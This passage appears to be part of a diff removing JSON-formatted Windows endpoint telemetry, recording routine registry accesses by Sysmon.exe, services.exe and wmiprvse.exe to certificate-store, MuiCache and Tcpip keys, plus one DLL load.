"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570848390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570848390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570848390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570848390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570848390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570848390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "utildll.dll", - "image_path": "C:\\Windows\\System32\\utildll.dll", - "pid": 3808, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883570847770000, - "unique_pid": "{42FC7E13-B2BB-5C05-0000-0010E9ED0200}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570848390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 3808, - "process_name": "wmiprvse.exe", - "process_path": "C:\\WINDOWS\\system32\\wbem\\wmiprvse.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883570848390000, - "unique_pid": "{42FC7E13-B2BB-5C05-0000-0010E9ED0200}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570848390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570848390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570848390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 3808, - "process_name": "wmiprvse.exe", - "process_path": "C:\\WINDOWS\\system32\\wbem\\wmiprvse.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883570848390000, - "unique_pid": "{42FC7E13-B2BB-5C05-0000-0010E9ED0200}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570848390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570848390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570848390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 3808, - "process_name": "wmiprvse.exe", - "process_path": "C:\\WINDOWS\\system32\\wbem\\wmiprvse.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883570848390000, - "unique_pid": "{42FC7E13-B2BB-5C05-0000-0010E9ED0200}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570848390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848390000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848390000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848390000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848390000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848390000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848390000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570848550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570848550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570848550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570848550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570848550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570848550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570848550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570848550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570848550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570848550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570848550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570848550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570848550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570848550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570848550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570848550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570848550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848550000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570848550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570848550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570848550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570848550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570848550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848550000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570848550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848550000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848550000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570848550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848550000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848550000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848550000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848550000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848550000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848550000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848550000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848550000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848550000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 